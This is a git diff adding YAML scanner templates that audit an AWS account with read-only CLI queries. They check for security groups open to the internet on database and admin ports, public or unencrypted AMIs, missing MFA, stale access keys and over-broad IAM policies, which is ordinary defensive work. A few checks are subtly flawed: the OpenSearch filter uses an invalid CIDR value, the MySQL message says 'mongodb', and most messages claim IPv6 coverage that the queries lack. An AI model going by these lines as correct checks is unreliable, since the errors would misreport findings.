a/cloud/aws/ec2/ec2-unrestricted-https.yaml b/cloud/aws/ec2/ec2-unrestricted-https.yaml new file mode 100644 index 0000000000..ba085352ae --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-https.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-https +info: + name: Unrestricted HTTPs on EC2 + author: princechaddha + severity: critical + description: | + Checks for inbound rules in EC2 security groups allowing unrestricted access (0.0.0.0/0) to TCP port 443, increasing exposure to potential breaches. + impact: | + Unrestricted access to TCP port 443 can lead to unauthorized data exposure and increases the risk of security breaches. + remediation: | + Restrict inbound traffic on TCP port 443 to only necessary IP addresses, adhering to the principle of least privilege. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=443 Name=ip-permission.to-port,Values=443 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 443"' diff --git a/cloud/aws/ec2/ec2-unrestricted-icmp.yaml b/cloud/aws/ec2/ec2-unrestricted-icmp.yaml new file mode 100644 index 0000000000..f59e789e42 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-icmp.yaml @@ -0,0 +1,37 @@ +id: ec2-unrestricted-icmp +info: + name: Restrict EC2 ICMP Access + author: princechaddha + severity: critical + description: | + Checks for Amazon EC2 security groups with inbound rules allowing unrestricted ICMP access. Advises restricting ICMP to trusted IPs to uphold the Principle of Least Privilege and minimize the attack surface. + impact: | + Unrestricted ICMP can be used for network reconnaissance and Distributed Denial of Service (DDoS) attacks, posing a significant security risk. + remediation: | + Modify EC2 security group rules to limit ICMP access to necessary, trusted IP addresses/ranges only. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.protocol,Values=icmp Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted ICMP access (0.0.0.0/0 or ::/0)"' diff --git a/cloud/aws/ec2/ec2-unrestricted-memcached.yaml b/cloud/aws/ec2/ec2-unrestricted-memcached.yaml new file mode 100644 index 0000000000..4a1c68ee72 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-memcached.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-memcached +info: + name: Unrestricted Access to Memcached + author: princechaddha + severity: critical + description: | + Detects unrestricted inbound access to Memcached on Amazon EC2 instances, which can lead to cache poisoning, unauthorized access, and DDoS attacks. + impact: | + Unrestricted access increases the risk of cache poisoning, unauthorized data access, and potential DDoS attacks on the Memcached server. + remediation: | + Restrict inbound access to Memcached by updating EC2 security group rules to allow only trusted IPs to connect on TCP/UDP port 11211. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=11211 Name=ip-permission.to-port,Values=11211 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 11211"' diff --git a/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml b/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml new file mode 100644 index 0000000000..cdd29bdea1 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml @@ -0,0 +1,38 @@ +id: ec2-unrestricted-mongodb +info: + name: Unrestricted MongoDB Access in EC2 + author: princechaddha + severity: critical + description: | + Identifies open access to MongoDB in AWS EC2 security groups, where inbound rules allow unrestricted access (0.0.0.0/0 or ::/0) to TCP port 27017. This poses a significant risk as it can lead to unauthorized access and potential data breaches. + impact: | + Allowing unrestricted access to MongoDB in EC2 can lead to unauthorized data access, data manipulation, or denial of service attacks, potentially resulting in critical data breaches and compliance violations. + remediation: | + Restrict MongoDB's TCP port 27017 access in EC2 security groups to only those IP addresses that require it, adhering to the principle of least privilege. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html + - https://www.mongodb.com/docs/manual/security/ + tags: cloud,devops,aws,amazon,ec2,mongodb,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=27017 Name=ip-permission.to-port,Values=27017 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=27017 Name=ip-permission.to-port,Values=27017 Name=ip-permission.ipv6-cidr,Values='::/0' --query 'SecurityGroups[*].GroupId' --output json + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted mongodb access (0.0.0.0/0 or ::/0) on port 27017"' diff --git a/cloud/aws/ec2/ec2-unrestricted-mssql.yaml b/cloud/aws/ec2/ec2-unrestricted-mssql.yaml new file mode 100644 index 0000000000..572d3da4b5 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-mssql.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-mssql +info: + name: Unrestricted Access to SQL on EC2 + author: princechaddha + severity: high + description: | + Identifies open inbound access to Microsoft SQL Server on Amazon EC2 instances. Checks for security groups allowing unrestricted access (0.0.0.0/0 or ::/0) on TCP port 1433, increasing risks to SQL databases. + impact: | + Unrestricted access on port 1433 exposes Microsoft SQL Server instances to potential unauthorized access, data breaches, and other security vulnerabilities. + remediation: | + Restrict inbound traffic on TCP port 1433 to known, secure IP addresses. Regularly review and update security group rules to maintain minimal access requirements. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=1433 Name=ip-permission.to-port,Values=1433 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 1433"' diff --git a/cloud/aws/ec2/ec2-unrestricted-mysql.yaml b/cloud/aws/ec2/ec2-unrestricted-mysql.yaml new file mode 100644 index 0000000000..92a53d114b --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-mysql.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-mysql +info: + name: Unrestricted MySQL Access on EC2 + author: princechaddha + severity: critical + description: | + Identifies unrestricted inbound access to MySQL database servers on Amazon EC2 instances, specifically targeting TCP port 3306. + impact: | + Unrestricted access to MySQL can lead to unauthorized data access, data manipulation, or exploitation of the database server. + remediation: | + Restrict inbound access on TCP port 3306 to known, necessary IP addresses or ranges, and avoid using 0.0.0.0/0 or ::/0. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=3306 Name=ip-permission.to-port,Values=3306 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted mongodb access (0.0.0.0/0 or ::/0) on port 3306"' diff --git a/cloud/aws/ec2/ec2-unrestricted-netbios.yaml b/cloud/aws/ec2/ec2-unrestricted-netbios.yaml new file mode 100644 index 0000000000..2dc70d4563 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-netbios.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-netbios +info: + name: Unrestricted NetBIOS Access in EC2 + author: princechaddha + severity: critical + description: | + Checks for inbound rules in Amazon EC2 security groups that allow unrestricted access on TCP port 139 and UDP ports 137 and 138, increasing the risk of unauthorized access and potential security breaches. + impact: | + Unrestricted NetBIOS access can expose EC2 instances to network-based attacks, compromising data integrity and system availability. + remediation: | + Restrict access to TCP port 139 and UDP ports 137 and 138 in EC2 security groups. Implement strict access control based on the principle of least privilege. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=137,138,139 Name=ip-permission.to-port,Values=137,138,139 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on ports 137, 138 or 139"' diff --git a/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml b/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml new file mode 100644 index 0000000000..73a0f533c6 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-opensearch +info: + name: Unrestricted OpenSearch Access + author: princechaddha + severity: critical + description: | + Checks EC2 security groups for inbound rules allowing unrestricted access to OpenSearch on TCP port 9200. Restricts access to essential IP addresses only. + impact: | + Unrestricted access to OpenSearch can lead to unauthorized data access, modification, or denial of service attacks. + remediation: | + Modify EC2 security group rules to limit access to TCP port 9200 for OpenSearch, allowing only necessary IPs, implementing the principle of least privilege. + reference: + - https://en.wikipedia.org/wiki/OpenSearch + tags: cloud,devops,aws,amazon,opensearch,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=9200 Name=ip-permission.to-port,Values=9200 Name=ip-permission.cidr,Values='0.0.0.0/0 or ::/0' --query 'SecurityGroups[*].GroupId' --output json + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 9200"' diff --git a/cloud/aws/ec2/ec2-unrestricted-oracle.yaml b/cloud/aws/ec2/ec2-unrestricted-oracle.yaml new file mode 100644 index 0000000000..c454cc071e --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-oracle.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-oracle +info: + name: Unrestricted Oracle DB Access + author: princechaddha + severity: critical + description: | + Identifies unrestricted inbound access to Oracle databases in Amazon EC2 instances, which increases the risk of unauthorized access and attacks. + impact: | + Allows potential unauthorized access to the Oracle database, leading to data leakage, data manipulation, or further exploitation. + remediation: | + Restrict inbound traffic on TCP port 1521 to known IPs or ranges and employ strict access controls. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=1521 Name=ip-permission.to-port,Values=1521 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 1521"' diff --git a/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml b/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml new file mode 100644 index 0000000000..17892c9b99 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-pgsql +info: + name: Unrestricted PostgreSQL Access + author: princechaddha + severity: critical + description: | + Identifies unrestricted inbound access to PostgreSQL databases in Amazon EC2 security groups, which can expose databases to security risks. + impact: | + Unrestricted access on TCP port 5432 increases vulnerability to unauthorized access and potential data breaches. + remediation: | + Restrict inbound traffic to PostgreSQL servers by setting stringent rules in EC2 security groups, limiting access to specific IPs or ranges. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html#security-group-rules + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=5432 Name=ip-permission.to-port,Values=5432 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 5432"' diff --git a/cloud/aws/ec2/ec2-unrestricted-rdp.yaml b/cloud/aws/ec2/ec2-unrestricted-rdp.yaml new file mode 100644 index 0000000000..e211ff4c4c --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-rdp.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-rdp +info: + name: Restrict EC2 RDP Access + author: princechaddha + severity: high + description: | + Check Amazon EC2 security groups for inbound rules that allow unrestricted RDP access and restrict access to trusted IPs. + impact: | + Unrestricted RDP access increases the risk of unauthorized access and potential breaches. + remediation: | + Modify the EC2 security group rules to limit RDP access (TCP 3389) to known, trusted IP addresses or ranges. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/authorizing-access-to-an-instance.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=3389 Name=ip-permission.to-port,Values=3389 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 3389"' diff --git a/cloud/aws/ec2/ec2-unrestricted-redis.yaml b/cloud/aws/ec2/ec2-unrestricted-redis.yaml new file mode 100644 index 0000000000..f0afa166e2 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-redis.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-redis +info: + name: Unrestricted Redis Access + author: princechaddha + severity: critical + description: | + Checks for inbound rules in Amazon EC2 security groups that allow unrestricted access to Redis cache server instances on TCP port 6379. + impact: | + Unrestricted access can expose Redis instances to unauthorized access and potential security breaches. + remediation: | + Restrict inbound access to Redis instances by updating EC2 security group rules to allow only specific, trusted IP addresses. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=6379 Name=ip-permission.to-port,Values=6379 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 6379"' diff --git a/cloud/aws/ec2/ec2-unrestricted-smtp.yaml b/cloud/aws/ec2/ec2-unrestricted-smtp.yaml new file mode 100644 index 0000000000..52d5305b6f --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-smtp.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-smtp +info: + name: Unrestricted SMTP Access in EC2 + author: princechaddha + severity: critical + description: | + Identifies unrestricted inbound access on TCP port 25 for EC2 security groups, which increases the risk of SMTP-related attacks. + impact: | + Allowing unrestricted SMTP access can lead to spamming, mail relay abuse, and potentially compromise mail servers. + remediation: | + Restrict TCP port 25 access to known, necessary IP addresses only. Avoid using 0.0.0.0/0 or ::/0 in security group rules. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/authorizing-access-to-an-instance.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=25 Name=ip-permission.to-port,Values=25 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 25"' diff --git a/cloud/aws/ec2/ec2-unrestricted-ssh.yaml b/cloud/aws/ec2/ec2-unrestricted-ssh.yaml new file mode 100644 index 0000000000..6ce8ac9003 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-ssh.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-ssh +info: + name: Unrestricted SSH Access in EC2 + author: princechaddha + severity: high + description: | + Checks for inbound rules in Amazon EC2 security groups that allow unrestricted SSH access (0.0.0.0/0 or ::/0) on TCP port 22, indicating a security risk by exposing the SSH server to the internet. + impact: | + Unrestricted SSH access increases the risk of unauthorized access and potential brute force attacks against the SSH server, compromising the security of the EC2 instances. + remediation: | + Restrict SSH access in EC2 security groups to trusted IP addresses or ranges, adhering to the Principle of Least Privilege (POLP) and mitigating the risk of unauthorized access. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=22 Name=ip-permission.to-port,Values=22 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 22"' diff --git a/cloud/aws/ec2/ec2-unrestricted-telnet.yaml b/cloud/aws/ec2/ec2-unrestricted-telnet.yaml new file mode 100644 index 0000000000..e5a460a541 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-telnet.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-telnet +info: + name: Restrict EC2 Telnet Access + author: princechaddha + severity: critical + description: | + Checks for unrestricted inbound Telnet access (TCP port 23) in Amazon EC2 security groups, highlighting potential security risks. + impact: | + Unrestricted Telnet access can expose EC2 instances to unauthorized access and potential security breaches. + remediation: | + Restrict inbound Telnet access by updating EC2 security group rules to allow only trusted IP ranges or disabling Telnet if not required. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/authorizing-access-to-an-instance.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=23 Name=ip-permission.to-port,Values=23 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 23"' diff --git a/cloud/aws/ec2/publicly-shared-ami.yaml b/cloud/aws/ec2/publicly-shared-ami.yaml new file mode 100644 index 0000000000..a00e97dbdf --- /dev/null +++ b/cloud/aws/ec2/publicly-shared-ami.yaml @@ -0,0 +1,55 @@ +id: publicly-shared-ami +info: + name: Publicly Shared AMI + author: princechaddha + severity: medium + description: | + Checks if Amazon Machine Images (AMIs) are publicly shared, potentially exposing sensitive data. + impact: | + Public sharing of AMIs can lead to unauthorized access and compromise of sensitive information contained within these images. + remediation: | + Restrict AMI sharing to specific, trusted AWS accounts and ensure they are not publicly accessible. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html + tags: cloud,devops,aws,amazon,ami,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let AmiName of iterate(template.amis)){ + set("ami", AmiName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-images --region $region --owners self --output json --query 'Images[*].ImageId' --output json + + extractors: + - type: json + name: amis + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-images --region $region --image-ids $ami --owners self --query 'Images[*].Public' + + matchers: + - type: word + words: + - "true" + + extractors: + - type: dsl + dsl: + - 'ami + " AMI is publically shared"' diff --git a/cloud/aws/ec2/unencrypted-aws-ami.yaml b/cloud/aws/ec2/unencrypted-aws-ami.yaml new file mode 100644 index 0000000000..23a1731df7 --- /dev/null +++ b/cloud/aws/ec2/unencrypted-aws-ami.yaml @@ -0,0 +1,55 @@ +id: unencrypted-aws-ami +info: + name: Unencrypted AWS AMI + author: princechaddha + severity: high + description: | + Ensure Amazon Machine Images (AMIs) are encrypted to meet data-at-rest encryption compliance and protect sensitive data. + impact: | + Unencrypted AMIs can expose sensitive data to unauthorized access, risking data breaches and non-compliance with data protection regulations. + remediation: | + Encrypt your AMIs using AWS managed keys or customer-managed keys in the AWS Key Management Service (KMS) to ensure data security. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIEncryption.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let AmiName of iterate(template.amis)){ + set("ami", AmiName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-images --region $region --owners self --output json --query 'Images[*].ImageId' + + extractors: + - type: json + name: amis + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-images --region $region --image-ids $ami --query 'Images[*].BlockDeviceMappings[*].Ebs.Encrypted[]' + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - 'ami + " AMI is not encrypted"' diff --git a/cloud/aws/iam/iam-access-analyzer.yaml b/cloud/aws/iam/iam-access-analyzer.yaml new file mode 100644 index 0000000000..a18f274de1 --- /dev/null +++ b/cloud/aws/iam/iam-access-analyzer.yaml @@ -0,0 +1,28 @@ +id: iam-access-analyzer +info: + name: IAM Access Analyzer is not Used + author: princechaddha + severity: medium + description: | + Checks if Amazon IAM Access Analyzer is active for identifying unsolicited access risks in AWS resources + reference: + - https://docs.aws.amazon.com/cli/latest/reference/accessanalyzer/list-analyzers.html + tags: cloud,devops,aws,amazon,iam,aws-cloud-config + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws accessanalyzer list-analyzers --query 'analyzers[*].arn' + + matchers: + - type: word + words: + - "[]" + + extractors: + - type: dsl + dsl: + - '"IAM Access Analyzer is not Used in your AWS account"' diff --git a/cloud/aws/iam/iam-expired-ssl.yaml b/cloud/aws/iam/iam-expired-ssl.yaml new file mode 100644 index 0000000000..b52895fa1e --- /dev/null +++ b/cloud/aws/iam/iam-expired-ssl.yaml @@ -0,0 +1,29 @@ +id: iam-expired-ssl +info: + name: Remove Expired SSL/TLS Certificates in AWS IAM + author: princechaddha + severity: high + description: | + Checks for expired SSL/TLS certificates from AWS IAM + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/list-server-certificates.html + tags: cloud,devops,aws,amazon,iam,ssl,aws-cloud-config + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam list-server-certificates | jq -r '.ServerCertificateMetadataList[] | select(.Expiration | fromdateiso8601 < now) | .ServerCertificateName' + + extractors: + - type: regex + name: certificate + internal: true + regex: + - '\b[a-zA-Z0-9]+\b' + + - type: dsl + dsl: + - 'certificate + " Certificate is expired in your AWS account"' diff --git a/cloud/aws/iam/iam-full-admin-privileges.yaml b/cloud/aws/iam/iam-full-admin-privileges.yaml new file mode 100644 index 0000000000..3539d31dc1 --- /dev/null +++ b/cloud/aws/iam/iam-full-admin-privileges.yaml @@ -0,0 +1,51 @@ +id: iam-full-admin-privileges +info: + name: Overly Permissive IAM Policies + author: princechaddha + severity: high + description: | + Verifies that no Amazon IAM policies grant full administrative privileges, ensuring adherence to the Principle of Least Privilege + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/get-policy-version.html + tags: cloud,devops,aws,amazon,iam,aws-cloud-config + +flow: | + code(1) + for(let PolicyName of iterate(template.policies)){ + set("policy", PolicyName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam list-policies --scope Local --query 'Policies[*].Arn' + + extractors: + - type: json # type of the extractor + internal: true + name: policies + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws iam get-policy-version --policy-arn $policy --version-id v1 --query 'PolicyVersion.Document' + + matchers: + - type: word + words: + - '"Effect": "Allow"' + - '"Action": "*"' + - '"Resource": "*"' + condition: and + + extractors: + - type: dsl + dsl: + - '"The IAM policy " + policy +" is Overly Permissive"' diff --git a/cloud/aws/iam/iam-key-rotation-90days.yaml b/cloud/aws/iam/iam-key-rotation-90days.yaml new file mode 100644 index 0000000000..e79b02a28b --- /dev/null +++ b/cloud/aws/iam/iam-key-rotation-90days.yaml @@ -0,0 +1,49 @@ +id: iam-key-rotation-90days +info: + name: IAM Access Key Rotation - 90-Day Policy + author: princechaddha + severity: high + description: | + Checks if IAM user access keys are rotated every 90 days to minimize accidental exposures and unauthorized access risks + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/list-access-keys.html + tags: cloud,devops,aws,amazon,iam,aws-cloud-config + +flow: | + code(1) + for(let UserName of iterate(template.users)){ + set("user", UserName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam list-users --query 'Users[*].UserName' + + extractors: + - type: json # type of the extractor + internal: true + name: users + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws iam list-access-keys --user-name $user | jq -r '.AccessKeyMetadata[] | select((.CreateDate[:-6] | strptime("%Y-%m-%dT%H:%M:%S") | mktime) < (now - (90 * 86400))) | .AccessKeyId' + + extractors: + - type: regex # type of the extractor + name: accesskey + internal: true + regex: + - '^AK.*' + + - type: dsl + dsl: + - '"The IAM Key " + accesskey +" is older than 90 days"' diff --git a/cloud/aws/iam/iam-mfa-enable.yaml b/cloud/aws/iam/iam-mfa-enable.yaml new file mode 100644 index 0000000000..b373266c7f --- /dev/null +++ b/cloud/aws/iam/iam-mfa-enable.yaml @@ -0,0 +1,48 @@ +id: iam-mfa-enable +info: + name: MFA not enabled for AWS IAM Console User + author: princechaddha + severity: high + description: | + Verifies that Multi-Factor Authentication (MFA) is enabled for all IAM users with console access in AWS + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/list-mfa-devices.html + tags: cloud,devops,aws,amazon,iam,aws-cloud-config + +flow: | + code(1) + for(let UserName of iterate(template.users)){ + set("user", UserName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam list-users --query 'Users[*].UserName' + + extractors: + - type: json # type of the extractor + internal: true + name: users + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws iam list-mfa-devices --user-name $user --query 'MFADevices' + + matchers: + - type: word + words: + - "[]" + + extractors: + - type: dsl + dsl: + - '"MFA is no enabled for IAM User " + user' diff --git a/cloud/aws/iam/iam-password-policy.yaml b/cloud/aws/iam/iam-password-policy.yaml new file mode 100644 index 0000000000..3de0b7e60d --- /dev/null +++ b/cloud/aws/iam/iam-password-policy.yaml @@ -0,0 +1,28 @@ +id: iam-password-policy +info: + name: IAM Password Policy Not Configured + author: princechaddha + severity: medium + description: | + Verifies that Amazon IAM users adhere to a strong password policy, including requirements for minimum length, expiration, and pattern + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/get-account-password-policy.html + tags: cloud,devops,aws,amazon,iam,aws-cloud-config + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam get-account-password-policy + + matchers: + - type: word + words: + - "NoSuchEntity" + + extractors: + - type: dsl + dsl: + - '"AWS cloud account is not configured with a custom IAM password policy"' diff --git a/cloud/aws/iam/iam-root-mfa.yaml b/cloud/aws/iam/iam-root-mfa.yaml new file mode 100644 index 0000000000..9f667d4781 --- /dev/null +++ b/cloud/aws/iam/iam-root-mfa.yaml @@ -0,0 +1,28 @@ +id: iam-root-mfa +info: + name: MFA not enabled on AWS Root Account + author: princechaddha + 